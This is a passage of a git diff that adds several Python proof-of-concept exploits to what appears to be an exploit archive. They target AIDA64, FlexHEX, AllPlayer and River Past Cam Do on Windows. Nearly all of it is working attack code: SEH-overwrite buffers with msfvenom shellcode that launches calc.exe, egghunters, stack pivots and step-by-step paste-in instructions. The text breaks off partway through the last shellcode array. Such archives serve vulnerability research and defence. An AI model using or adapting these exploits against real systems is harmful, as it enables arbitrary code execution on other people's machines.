 # Note 2 : All the old versions of the program that are available on the sites like soft32.com,           #
 # or in https://www.aida64.com/downloads/archive                                                          #
 # have the same vulnerabily in different offsets (for example version 5.70.3800 )                         #
 # Note 3 : this technique (EggHunter) has been used to run vulnerability in different windows versions.   #
 # Steps :                                                                                                 #
-#  1- Run python code : Aida64.py ( Three files are created )                                             #
+#  1- Run python code : Aida64-Extreme.py ( Three files are created )                                     #
 #  2- App --> File --> Preferences --> Email --> SMTP --> paste in contents from the egg.txt              #
 #         into "Display name" --> Ok                                                                      #
 #  3- Report --> Report Wizard ... --> Next --> paste in contents from the egghunter-winxp-win7.txt       #
diff --git a/exploits/windows/local/46639.py b/exploits/windows/local/46639.py
new file mode 100755
index 000000000..3f1ce0ad0
--- /dev/null
+++ b/exploits/windows/local/46639.py
@@ -0,0 +1,138 @@
+#!/usr/bin/python                                                                                         #
+# Exploit Title: AIDA64 Business 5.99.4900 - SEH Buffer Overflow (EggHunter)                              #
+# Date: 2019-04-01                                                                                        #
+# Vendor Homepage: https://www.aida64.com                                                                 #
+# Software Link: https://www.aida64.com/downloads                                                         #
+# Mirror Link : https://www.softpedia.com/get/System/System-Info/AIDA64-Business-Edition.shtml            #
+# Exploit Author: Peyman Forouzan                                                                         #
+# Tested Version: 5.99.4900                                                                               #
+# Tested on: Winxp SP2 32-64 bit - Win7 Enterprise SP1 32-64 bit - Win10 Enterprise 32-64 bit             #
+# Special Thanks to my wife                                                                               #
+# The program has SEH Buffer Overflow in several places.(this code show one of them)                      #
+# Note 1 : To optimize code, I've used a "stack pivot" that is the same in                                #
+# (Extreme, Engineer, Network Audit) Editions.                                                            #
+# So this code works in (Extreme, Engineer, Network Audit) of version 5.99.4900                           #
+# But the stack pivots in Business Edition are different.                                                 #
+# Note 2 : All the old versions of the program that are available on the sites like soft32.com,           #
+# or in https://www.aida64.com/downloads/archive                                                          #
+# have the same vulnerabily in different offsets (for example version 5.70.3800 )                         #
+# Note 3 : this technique (EggHunter) has been used to run vulnerability in different windows versions.   #
+# Steps :                                                                                                 #
+#  1- Run python code : Aida64-Business.py ( Three files are created )                                    #
+#  2- App --> File --> Preferences --> Email --> SMTP --> paste in contents from the egg.txt              #
+#         into "Display name" --> Ok                                                                      #
+#  3- Report --> Report Wizard ... --> Next --> paste in contents from the egghunter-winxp-win7.txt       #
+#     or egghunter-win10.txt (depend on your windows version) into "Load from file" --> Next              #
+#     --> Wait a minute --> Shellcode (Calc) open                                                         #
+#---------------------------------------------------------------------------------------------------------#
+
+#------------------------------------   EGG Shellcode Generation    ---------------------------------------
+
+bufsize = 292
+
+#msfvenom -p windows/exec cmd=calc.exe BufferRegister=EDI -e x86/alpha_mixed -f python -a x86 --platform windows -v egg
+egg =  "w00tw00t"
+egg += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
+egg += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"
+egg += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
+egg += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
+egg += "\x79\x6c\x5a\x48\x4e\x62\x77\x70\x57\x70\x63\x30\x71"
+egg += "\x70\x4b\x39\x5a\x45\x35\x61\x4f\x30\x52\x44\x4c\x4b"
+egg += "\x52\x70\x46\x50\x6c\x4b\x53\x62\x54\x4c\x6c\x4b\x43"
+egg += "\x62\x44\x54\x6c\x4b\x71\x62\x51\x38\x34\x4f\x6e\x57"
+egg += "\x31\x5a\x36\x46\x55\x61\x6b\x4f\x4c\x6c\x37\x4c\x75"
+egg += "\x31\x73\x4c\x45\x52\x54\x6c\x77\x50\x49\x51\x48\x4f"
+egg += "\x34\x4d\x53\x31\x69\x57\x39\x72\x4a\x52\x62\x72\x43"
+egg += "\x67\x6e\x6b\x71\x42\x52\x30\x4c\x4b\x70\x4a\x47\x4c"
+egg += "\x6e\x6b\x62\x6c\x62\x31\x72\x58\x6a\x43\x70\x48\x33"
+egg += "\x31\x4e\x31\x52\x71\x4c\x4b\x36\x39\x37\x50\x63\x31"
+egg += "\x5a\x73\x4c\x4b\x42\x69\x52\x38\x68\x63\x57\x4a\x31"
+egg += "\x59\x4e\x6b\x44\x74\x4c\x4b\x55\x51\x38\x56\x50\x31"
+egg += "\x6b\x4f\x6e\x4c\x69\x51\x78\x4f\x46\x6d\x36\x61\x58"
+egg += "\x47\x46\x58\x4b\x50\x52\x55\x39\x66\x65\x53\x71\x6d"
+egg += "\x79\x68\x45\x6b\x31\x6d\x45\x74\x34\x35\x7a\x44\x52"
+egg += "\x78\x4c\x4b\x62\x78\x77\x54\x47\x71\x58\x53\x75\x36"
+egg += "\x6c\x4b\x34\x4c\x70\x4b\x6c\x4b\x52\x78\x35\x4c\x43"
+egg += "\x31\x58\x53\x6c\x4b\x73\x34\x6e\x6b\x67\x71\x58\x50"
+egg += "\x6c\x49\x73\x74\x45\x74\x55\x74\x63\x6b\x61\x4b\x33"
+egg += "\x51\x32\x79\x51\x4a\x36\x31\x49\x6f\x4b\x50\x71\x4f"
+egg += "\x71\x4f\x42\x7a\x6c\x4b\x44\x52\x48\x6b\x6e\x6d\x31"
+egg += "\x4d\x50\x6a\x35\x51\x6e\x6d\x6f\x75\x48\x32\x55\x50"
+egg += "\x75\x50\x53\x30\x46\x30\x55\x38\x74\x71\x4c\x4b\x72"
+egg += "\x4f\x4e\x67\x69\x6f\x6b\x65\x4d\x6b\x5a\x50\x38\x35"
+egg += "\x79\x32\x56\x36\x45\x38\x59\x36\x6a\x35\x6f\x4d\x6f"
+egg += "\x6d\x69\x6f\x59\x45\x35\x6c\x64\x46\x31\x6c\x76\x6a"
+egg += "\x4b\x30\x79\x6b\x4b\x50\x74\x35\x73\x35\x4d\x6b\x73"
+egg += "\x77\x65\x43\x71\x62\x32\x4f\x50\x6a\x75\x50\x31\x43"
+egg += "\x39\x6f\x5a\x75\x55\x33\x43\x51\x72\x4c\x45\x33\x44"
+egg += "\x6e\x62\x45\x31\x68\x62\x45\x63\x30\x41\x41"
+
+f = open ("egg.txt", "w")
+f.write(egg)
+f.close()
+
+#----------------------------------   EGG Hunter Shellcode Generation  ------------------------------------
+egghunter =  "\x8b\x7c\x24\x08\xbe\xe9\xfe\xff\xff\xf7\xde\x29\xf7"
+egghunter += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
+egghunter += "\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58"
+egghunter += "\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42"
+egghunter += "\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41"
+egghunter += "\x42\x75\x4a\x49\x70\x66\x4c\x4c\x78\x4b\x6b\x30"
+egghunter += "\x49\x6b\x54\x63\x42\x55\x74\x4a\x66\x51\x69\x4b"
+egghunter += "\x36\x51\x38\x52\x36\x33\x52\x73\x36\x33\x36\x33"
+egghunter += "\x38\x33\x4f\x30\x71\x76\x4d\x51\x6b\x7a\x39\x6f"
+egghunter += "\x66\x6f\x47\x32\x36\x32\x4d\x50\x59\x6b\x59\x50"
+egghunter += "\x33\x44\x57\x78\x43\x5a\x66\x62\x72\x78\x78\x4d"
+egghunter += "\x44\x6e\x73\x6a\x7a\x4b\x37\x62\x52\x4a\x71\x36"
+egghunter += "\x61\x48\x55\x61\x69\x59\x6f\x79\x79\x72\x70\x64"
+egghunter += "\x59\x6f\x75\x43\x73\x6a\x6e\x63\x57\x4c\x71\x34"
+egghunter += "\x47\x70\x42\x54\x76\x61\x72\x7a\x57\x4c\x37\x75"
+egghunter += "\x74\x34\x7a\x76\x6c\x78\x72\x57\x46\x50\x76\x50"
+egghunter += "\x63\x44\x6d\x59\x59\x47\x4e\x4f\x71\x65\x4e\x31"
+egghunter += "\x6e\x4f\x51\x65\x38\x4e\x79\x6f\x4b\x57\x41\x41"
+
+egghunter10 =  "\x8b\x7c\x24\x08\xbe\xe9\xfe\xff\xff\xf7\xde\x29"
+egghunter10 += "\xf7\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49"
+egghunter10 += "\x49\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41"
+egghunter10 += "\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41"
+egghunter10 += "\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38"
+egghunter10 += "\x41\x42\x75\x4a\x49\x4d\x53\x5a\x4c\x34\x70\x50"
+egghunter10 += "\x31\x69\x42\x30\x52\x70\x52\x30\x52\x62\x46\x4e"
+egghunter10 += "\x6c\x4a\x6b\x6b\x30\x59\x6b\x76\x43\x44\x35\x54"
+egghunter10 += "\x42\x4d\x63\x59\x50\x30\x66\x4b\x31\x59\x5a\x69"
+egghunter10 += "\x6f\x56\x6f\x43\x72\x31\x42\x6b\x30\x39\x6b\x6f"
+egghunter10 += "\x30\x44\x34\x44\x4c\x48\x38\x64\x7a\x39\x6e\x39"
+egghunter10 += "\x6f\x49\x6f\x6c\x37\x4b\x68\x68\x4d\x64\x6e\x72"
+egghunter10 += "\x7a\x58\x6b\x47\x61\x54\x71\x4b\x6b\x76\x33\x31"
+egghunter10 += "\x43\x76\x33\x50\x6a\x45\x79\x46\x38\x78\x33\x39"
+egghunter10 += "\x50\x45\x34\x49\x6f\x46\x73\x4f\x73\x4b\x74\x66"
+egghunter10 += "\x6c\x72\x7a\x65\x6c\x46\x65\x54\x34\x5a\x73\x78"
+egghunter10 += "\x38\x51\x67\x34\x70\x30\x30\x30\x74\x4b\x39\x78"
+egghunter10 += "\x57\x6e\x4f\x42\x55\x48\x4e\x4e\x4f\x74\x35\x5a"
+egghunter10 += "\x6b\x69\x6f\x4b\x57\x41\x41"
+
+jmpback = "\xe9\xdc\xfe\xff\xff"  # jmp back
+nseh = "\xeb\xf9\x90\x90"         # jmp Short back
+seh = "\x50\x15\x40"              # Overwrite Seh - Golden Pivot !! - Works on all Editions
+
+buffer  = egghunter
+buffer += "\x41" * (bufsize-len(buffer)-len(jmpback))
+buffer += jmpback
+buffer += nseh
+buffer += seh
+print "[+] Creating %s bytes payload for winxp and windows 7 ..." %len(buffer)
+f = open ("egghunter-winxp-win7.txt", "w")
+print "[+] File created!"
+f.write(buffer)
+f.close()
+
+buffer  = egghunter10
+buffer += "\x41" * (bufsize-len(buffer)-len(jmpback))
+buffer += jmpback
+buffer += nseh
+buffer += seh
+print "[+] Creating %s bytes payload for windows 10 ..." %len(buffer)
+f = open ("egghunter-win10.txt", "w")
+print "[+] File created!"
+f.write(buffer)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/local/46657.py b/exploits/windows/local/46657.py
new file mode 100755
index 000000000..e3a27e660
--- /dev/null
+++ b/exploits/windows/local/46657.py
@@ -0,0 +1,52 @@
+#!/usr/bin/python
+ 
+###############################################################################
+# Exploit Title:        AIDA64 Engineer 5.99.4900 - 'Load from file' Field Buffer Overflow (SEH)
+# Date:                 04-04-2019
+# Exploit Author:       Anurag Srivastava and Vardan Bansal 
+# Website:    			www.theanuragsrivastava.in
+# Vulnerable Software:  AIDA64 Engineer  
+# Vendor Homepage:      http://download.aida64.com/
+# Version:              5.99.4900
+# Software Link:        http://download.aida64.com/aida64engineer599.exe
+# Tested On:            Windows 7 x64 
+# CVE:					CVE-2019-10843
+#
+# To reproduce the exploit:
+#   1. Click Report
+#   2. In the "Load from a File" field, paste the content of hex.txt
+#
+##############################################################################
+
+buf =  ""
+buf += "\xda\xd7\xd9\x74\x24\xf4\xba\x07\xc8\xf9\x11\x5e\x2b"
+buf += "\xc9\xb1\x31\x31\x56\x18\x03\x56\x18\x83\xee\xfb\x2a"
+buf += "\x0c\xed\xeb\x29\xef\x0e\xeb\x4d\x79\xeb\xda\x4d\x1d"
+buf += "\x7f\x4c\x7e\x55\x2d\x60\xf5\x3b\xc6\xf3\x7b\x94\xe9"
+buf += "\xb4\x36\xc2\xc4\x45\x6a\x36\x46\xc5\x71\x6b\xa8\xf4"
+buf += "\xb9\x7e\xa9\x31\xa7\x73\xfb\xea\xa3\x26\xec\x9f\xfe"
+buf += "\xfa\x87\xd3\xef\x7a\x7b\xa3\x0e\xaa\x2a\xb8\x48\x6c"
+buf += "\xcc\x6d\xe1\x25\xd6\x72\xcc\xfc\x6d\x40\xba\xfe\xa7"
+buf += "\x99\x43\xac\x89\x16\xb6\xac\xce\x90\x29\xdb\x26\xe3"
+buf += "\xd4\xdc\xfc\x9e\x02\x68\xe7\x38\xc0\xca\xc3\xb9\x05"
+buf += "\x8c\x80\xb5\xe2\xda\xcf\xd9\xf5\x0f\x64\xe5\x7e\xae"
+buf += "\xab\x6c\xc4\x95\x6f\x35\x9e\xb4\x36\x93\x71\xc8\x29"
+buf += "\x7c\x2d\x6c\x21\x90\x3a\x1d\x68\xfe\xbd\x93\x16\x4c"
+buf += "\xbd\xab\x18\xe0\xd6\x9a\x93\x6f\xa0\x22\x76\xd4\x5e"
+buf += "\x69\xdb\x7c\xf7\x34\x89\x3d\x9a\xc6\x67\x01\xa3\x44"
+buf += "\x82\xf9\x50\x54\xe7\xfc\x1d\xd2\x1b\x8c\x0e\xb7\x1b"
+buf += "\x23\x2e\x92\x7f\xa2\xbc\x7e\xae\x41\x45\xe4\xae"
+  
+ 
+nSEH = "\xeb\xf9\x90\x90" 
+
+back = "\xe9\xdc\xfe\xff\xff"  # jmp back to start of shellcode
+SEH = "\x23\x02\x1c\x01" #pop ebx # pop eax # ret  | ascii {PAGE_EXECUTE_READWRITE} [aida64.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v5.99.4900 (C:\Program Files\FinalWire\AIDA64 Engineer\aida64.exe
+
+buffer = "\x41" * (292-len(buf)-len(back))
+padding = "\x42"*(500-292-4-4)
+data = buf + buffer + back + nSEH + SEH + padding
+ 
+f = open ("hex.txt", "w")
+f.write(data)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/local/46660.py b/exploits/windows/local/46660.py
new file mode 100755
index 000000000..d67dc7d5a
--- /dev/null
+++ b/exploits/windows/local/46660.py
@@ -0,0 +1,91 @@
+#!/usr/bin/python                                                                                         #
+# Exploit Title: AIDA64 Extreme 5.99.4900 - Logging SEH Buffer Overflow                                   #
+# Date: 2019-04-02                                                                                        #
+# Vendor Homepage: https://www.aida64.com                                                                 #
+# Software Link: http://download.aida64.com/aida64extreme599.exe                                          #
+# Mirror Link : https://www.nikktech.com/main/downloads/finalwire/aida64extreme599.exe                    #
+# Exploit Author: Peyman Forouzan                                                                         #
+# Tested Version: 5.99.4900                                                                               #
+# Tested on: Winxp SP2 32-64 bit - Win7 Enterprise SP1 32-64 bit - Win10 Enterprise 32-64 bit             #
+# Special Thanks to my wife                                                                               #
+# Steps :                                                                                                 #
+#  1- Run python code : Aida64-Extreme.py ( Two files are created )                                       #
+#  2- App --> File --> Preferences --> Hardware Monitoring --> Logging --> paste in contents from the     #
+#     exploit-x32.txt or exploit-x64.txt (depend on your windows version)                                 #
+#     into "Log sensor reading to CSV log file : " --> OK                                                 #
+#  3- File --> Exit  (Do not directly close the program window, If you want to do this,                   #
+#      some codes must be changed - See the comments in code)                                             #
+#      --> Shellcode (Calc) open                                                                          #
+#---------------------------------------------------------------------------------------------------------#
+bufsize1 = 1120 # for windows-x32
+#bufsize1 = 1088 # for windows-x32 - if you directly close the program window
+bufsize2 = 1114 # for windows-x64
+#bufsize2 = 1082 # for windows-x64 - if you directly close the program window
+
+#msfvenom -p windows/exec cmd=calc.exe -e x86/alpha_mixed -f python -a x86 --platform windows -v calc
+calc =  ""
+calc += "\x89\xe2\xdb\xd5\xd9\x72\xf4\x5b\x53\x59\x49\x49\x49"
+calc += "\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43"
+calc += "\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41"
+calc += "\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
+calc += "\x58\x50\x38\x41\x42\x75\x4a\x49\x39\x6c\x6d\x38\x6f"
+calc += "\x72\x35\x50\x75\x50\x45\x50\x45\x30\x4c\x49\x79\x75"
+calc += "\x64\x71\x49\x50\x52\x44\x4e\x6b\x70\x50\x64\x70\x6c"
+calc += "\x4b\x31\x42\x44\x4c\x4e\x6b\x73\x62\x57\x64\x4e\x6b"
+calc += "\x71\x62\x44\x68\x56\x6f\x78\x37\x32\x6a\x31\x36\x45"
+calc += "\x61\x39\x6f\x6c\x6c\x45\x6c\x30\x61\x33\x4c\x65\x52"
+calc += "\x44\x6c\x47\x50\x49\x51\x7a\x6f\x46\x6d\x37\x71\x4a"
+calc += "\x67\x39\x72\x78\x72\x46\x32\x32\x77\x4c\x4b\x43\x62"
+calc += "\x76\x70\x4c\x4b\x43\x7a\x47\x4c\x4e\x6b\x52\x6c\x62"
+calc += "\x31\x52\x58\x4a\x43\x51\x58\x37\x71\x68\x51\x70\x51"
+calc += "\x6e\x6b\x36\x39\x45\x70\x75\x51\x7a\x73\x4c\x4b\x42"
+calc += "\x69\x45\x48\x5a\x43\x36\x5a\x37\x39\x4e\x6b\x56\x54"
+calc += "\x6e\x6b\x73\x31\x4a\x76\x74\x71\x59\x6f\x4c\x6c\x69"
+calc += "\x51\x5a\x6f\x44\x4d\x77\x71\x48\x47\x64\x78\x79\x70"
+calc += "\x33\x45\x79\x66\x34\x43\x53\x4d\x5a\x58\x75\x6b\x51"
+calc += "\x6d\x76\x44\x63\x45\x79\x74\x51\x48\x4c\x4b\x30\x58"
+calc += "\x31\x34\x65\x51\x38\x53\x53\x56\x6e\x6b\x34\x4c\x30"
+calc += "\x4b\x6e\x6b\x46\x38\x57\x6c\x63\x31\x49\x43\x4e\x6b"
+calc += "\x34\x44\x6e\x6b\x35\x51\x38\x50\x6e\x69\x30\x44\x34"
+calc += "\x64\x35\x74\x31\x4b\x63\x6b\x45\x31\x73\x69\x63\x6a"
+calc += "\x62\x71\x39\x6f\x6b\x50\x33\x6f\x53\x6f\x52\x7a\x4e"
+calc += "\x6b\x72\x32\x38\x6b\x6c\x4d\x53\x6d\x32\x4a\x43\x31"
+calc += "\x6c\x4d\x6f\x75\x4c\x72\x45\x50\x77\x70\x67\x70\x76"
+calc += "\x30\x42\x48\x35\x61\x6c\x4b\x30\x6f\x4c\x47\x49\x6f"
+calc += "\x59\x45\x4f\x4b\x38\x70\x4e\x55\x4e\x42\x36\x36\x65"
+calc += "\x38\x6d\x76\x4c\x55\x4d\x6d\x6f\x6d\x79\x6f\x39\x45"
+calc += "\x55\x6c\x55\x56\x73\x4c\x74\x4a\x4f\x70\x39\x6b\x6b"
+calc += "\x50\x53\x45\x47\x75\x4d\x6b\x43\x77\x54\x53\x31\x62"
+calc += "\x50\x6f\x61\x7a\x77\x70\x32\x73\x39\x6f\x48\x55\x45"
+calc += "\x33\x73\x51\x50\x6c\x65\x33\x36\x4e\x53\x55\x62\x58"
+calc += "\x63\x55\x53\x30\x41\x41"
+
+jmpback1 = "\xe9\xa0\xfb\xff\xff"	# Jmp back
+#jmpback1 = "\xe9\xc0\xfb\xff\xff"	# Jmp back - if you directly close the program window
+jmpback2 = "\xe9\xa6\xfb\xff\xff"	# Jmp back
+#jmpback2 = "\xe9\xc6\xfb\xff\xff"	# Jmp back- if you directly close the program window
+
+nseh = "\xeb\xf9\x90\x90"			# Jmp Short back
+seh = "\x02\xeb\x1a\x01"			# Overwrite Seh # 0x011aeb02 : {pivot 8}
+
+buffer  = calc
+buffer += "\x41" * (bufsize1-len(buffer)-len(jmpback1))
+buffer += jmpback1
+buffer += nseh
+buffer += seh
+print "[+] Creating %s bytes payload for windows-x32 ..." %len(buffer)
+f = open ("exploit-x32.txt", "w")
+print "[+] File created!"
+f.write(buffer)
+f.close()
+
+buffer  = calc
+buffer += "\x41" * (bufsize2-len(buffer)-len(jmpback2))
+buffer += jmpback2
+buffer += nseh
+buffer += seh
+print "[+] Creating %s bytes payload for windows-x64 ..." %len(buffer)
+f = open ("exploit-x64.txt", "w")
+print "[+] File created!"
+f.write(buffer)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/local/46665.py b/exploits/windows/local/46665.py
new file mode 100755
index 000000000..ae4fe6bf4
--- /dev/null
+++ b/exploits/windows/local/46665.py
@@ -0,0 +1,60 @@
+#!/usr/bin/python -w
+
+#
+# Exploit Author: Chris Au
+# Exploit Title:  FlexHEX 2.71 - Local Buffer Overflow (SEH Unicode)
+# Date: 06-04-2019
+# Vulnerable Software: FlexHEX 2.71
+# Vendor Homepage: http://www.flexhex.com
+# Version: 2.71
+# Software Link: http://www.flexhex.com/download/flexhex_setup.exe
+# Tested Windows Windows XP SP3
+#
+#
+# PoC
+# 1. generate evil.txt, copy contents to clipboard
+# 2. open FlexHEX Editor
+# 3. select "Stream", click "New Stream..."
+# 4. paste contents from clipboard in the "Stream Name:"
+# 5. select OK
+# 6. calc.exe
+#
+ 
+filename="evil.txt"
+junk = "\xcc" * 276
+nseh = "\x90\x45"
+seh = "\xd5\x52" #pop pop retn
+valign = (
+"\x45" #align
+"\x56" #push esi
+"\x45" #align
+"\x58" #pop eax
+"\x45" #align
+"\x05\x20\x11" #add eax,11002000
+"\x45" #align
+"\x2d\x1a\x11" #sub eax,11001a00
+"\x45" #align
+"\x50" #push eax
+"\x45" #align
+"\xc3" #retn
+)
+#nop to shell
+nop = "\x45" * 94
+#call calc.exe, bufferRegister=EAX
+shellcode = (
+"PPYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAI"
+"AQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIA"
+"JQYAZBABABABABkMAGB9u4JBkLK8qrM0ypyps0e9xeP1Y0RD4K"
+"npnPrkPRLLbkb2N42kt2lhlOegmzkvMaYodlMl0aqlKRnLo0Uq"
+"foLMzai7zBl2nrOgTKnrJptKNjoLBkpLjqahISQ8KQ8QpQRkaI"
+"kpKQYCbkMyzxHcnZq9bkNTTK9q9FMaYofLVa8OLMjaI7p8GpRU"
+"9flCamXxmksMo4d5JD1HrknxMTYq8Sc6RkJl0KtKnxKlkQFs4K"
+"zdtKKQJ0RiQ4NDLdOkOkC1pYOjOakOyPQOqOpZ4KN2zKTMaM0j"
+"kQbmu55bKP9pM0b0C8014KROQwkOIEek8pTuTbPVQXcvTU7MeM"
+"iohUOLm6qlyze09k7p0u9ugKa7mCPrbOqZ9pOcYoHURCPa0l0c"
+"Lnc51hOuipAA")
+fill = "\x45" * 5000
+buffer = junk + nseh + seh + valign + nop + shellcode + fill
+textfile = open(filename , 'w')
+textfile.write(buffer)
+textfile.close()
\ No newline at end of file
diff --git a/exploits/windows/local/46668.py b/exploits/windows/local/46668.py
new file mode 100755
index 000000000..3bfad8cd3
--- /dev/null
+++ b/exploits/windows/local/46668.py
@@ -0,0 +1,59 @@
+#!/usr/bin/python -w
+
+#
+# Exploit Author: Chris Au
+# Exploit Title:  AllPlayer V7.4 - Local Buffer Overflow (SEH Unicode)
+# Date: 07-04-2019
+# Vulnerable Software: AllPlayer V7.4
+# Vendor Homepage: https://www.allplayer.org/
+# Version: 7.4
+# Software Link: http://allplayer.org/Download/ALLPlayerEN.exe
+# Tested Windows Windows 7 SP1 x86
+#
+#
+# PoC
+# 1. generate evil.txt, copy contents to clipboard
+# 2. open AllPlayer
+# 3. select "Open video or audio file", click "Open URL"
+# 4. paste contents from clipboard
+# 5. select OK
+# 6. calc.exe
+#
+
+filename="evil.txt"
+header = "http://"
+junk = "\xcc" * 301
+nseh = "\x90\x45"
+seh = "\x7a\x74" #pop pop retn
+valign = (
+"\x55" #push ebp
+"\x45" #align
+"\x58" #pop eax
+"\x45" #align
+"\x05\x20\x11" #add eax,11002000
+"\x45" #align
+"\x2d\x18\x11" #sub eax,11001900
+"\x45" #align
+"\x50" #push eax
+"\x45" #align
+"\xc3" #retn
+)
+#nop to shell
+nop = "\xcc" * 115
+shellcode = (
+"PPYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAI"
+"AQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIA"
+"JQYAZBABABABABkMAGB9u4JBkLK8qrM0ypyps0e9xeP1Y0RD4K"
+"npnPrkPRLLbkb2N42kt2lhlOegmzkvMaYodlMl0aqlKRnLo0Uq"
+"foLMzai7zBl2nrOgTKnrJptKNjoLBkpLjqahISQ8KQ8QpQRkaI"
+"kpKQYCbkMyzxHcnZq9bkNTTK9q9FMaYofLVa8OLMjaI7p8GpRU"
+"9flCamXxmksMo4d5JD1HrknxMTYq8Sc6RkJl0KtKnxKlkQFs4K"
+"zdtKKQJ0RiQ4NDLdOkOkC1pYOjOakOyPQOqOpZ4KN2zKTMaM0j"
+"kQbmu55bKP9pM0b0C8014KROQwkOIEek8pTuTbPVQXcvTU7MeM"
+"iohUOLm6qlyze09k7p0u9ugKa7mCPrbOqZ9pOcYoHURCPa0l0c"
+"Lnc51hOuipAA")
+fill = "\x45" * 5000
+buffer = header + junk + nseh + seh + valign + nop + shellcode + fill
+textfile = open(filename , 'w')
+textfile.write(buffer)
+textfile.close()
\ No newline at end of file
diff --git a/exploits/windows/local/46670.py b/exploits/windows/local/46670.py
new file mode 100755
index 000000000..36e2b1b41
--- /dev/null
+++ b/exploits/windows/local/46670.py
@@ -0,0 +1,70 @@
+#!/usr/bin/python -w
+
+#
+# Exploit Author: Chris Au
+# Exploit Title:  River Past Cam Do 3.7.6 Local Buffer Overflow in Activation Code
+# Date: 07-04-2019
+# Vulnerable Software: River Past Cam Do 3.7.6
+# Vendor Homepage: http://www.flexhex.com
+# Version: 3.7.6
+# Software Link: https://en.softonic.com/download/river-past-cam-do/windows/post-download?sl=1
+# Tested Windows Windows XP SP3 EN
+#
+#
+# PoC
+# 1. generate evil.txt, copy contents to clipboard
+# 2. open Cam Do
+# 3. the application will ask you to input the activation code in order to activate it
+# 4. paste contents from clipboard in the "Activation code"
+# 5. select Activate
+# 6. calc.exe
+#
+
+filename="evil.txt"
+junk = "A" * 608
+nseh = "\xeb\x09\x90\x90"
+seh = "\x0e\x7d\x01\x10" ##pop pop ret rvddshow2.dll	
+
+jmp = (
+"\x58"
+"\xff\xe0"
+"\xe8\xf8\xff\xff\xff"
+)
+#msfvenom -p windows/exec CMD=calc.exe -b "\x00\x0a\x0e\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x80\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8e\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9e\x9f\xa4\xa6\xa8\xb8\xbc\xbd\xbe" BufferRegister=EAX -f c
+
+shellcode = (
+"\x50\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x56"
+"\x54\x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30"
+"\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42"
+"\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b"
+"\x4c\x5a\x48\x4b\x32\x35\x50\x33\x30\x33\x30\x55\x30\x4d\x59"
+"\x4a\x45\x30\x31\x59\x50\x43\x54\x4c\x4b\x56\x30\x36\x50\x4c"
+"\x4b\x50\x52\x54\x4c\x4c\x4b\x50\x52\x42\x34\x4c\x4b\x53\x42"
+"\x31\x38\x44\x4f\x38\x37\x51\x5a\x37\x56\x30\x31\x4b\x4f\x4e"
+"\x4c\x47\x4c\x45\x31\x53\x4c\x35\x52\x46\x4c\x37\x50\x49\x51"
+"\x58\x4f\x44\x4d\x53\x31\x59\x57\x4a\x42\x5a\x52\x51\x42\x50"
+"\x57\x4c\x4b\x36\x32\x52\x30\x4c\x4b\x31\x5a\x57\x4c\x4c\x4b"
+"\x30\x4c\x54\x51\x43\x48\x4d\x33\x30\x48\x45\x51\x58\x51\x46"
+"\x31\x4c\x4b\x51\x49\x57\x50\x55\x51\x48\x53\x4c\x4b\x57\x39"
+"\x44\x58\x4d\x33\x56\x5a\x51\x59\x4c\x4b\x46\x54\x4c\x4b\x33"
+"\x31\x58\x56\x36\x51\x4b\x4f\x4e\x4c\x49\x51\x58\x4f\x44\x4d"
+"\x53\x31\x58\x47\x37\x48\x4d\x30\x32\x55\x5a\x56\x33\x33\x53"
+"\x4d\x5a\x58\x37\x4b\x33\x4d\x47\x54\x33\x45\x4a\x44\x50\x58"
+"\x4c\x4b\x50\x58\x56\x44\x45\x51\x38\x53\x52\x46\x4c\x4b\x44"
+"\x4c\x50\x4b\x4c\x4b\x50\x58\x35\x4c\x43\x31\x49\x43\x4c\x4b"
+"\x45\x54\x4c\x4b\x53\x31\x4e\x30\x4b\x39\x47\x34\x46\x44\x51"
+"\x34\x31\x4b\x31\x4b\x35\x31\x50\x59\x30\x5a\x36\x31\x4b\x4f"
+"\x4d\x30\x31\x4f\x51\x4f\x51\x4a\x4c\x4b\x44\x52\x4a\x4b\x4c"
+"\x4d\x51\x4d\x53\x5a\x43\x31\x4c\x4d\x4c\x45\x38\x32\x35\x50"
+"\x55\x50\x55\x50\x56\x30\x43\x58\x56\x51\x4c\x4b\x42\x4f\x4b"
+"\x37\x4b\x4f\x58\x55\x4f\x4b\x5a\x50\x48\x35\x39\x32\x51\x46"
+"\x55\x38\x39\x36\x4d\x45\x4f\x4d\x4d\x4d\x4b\x4f\x49\x45\x47"
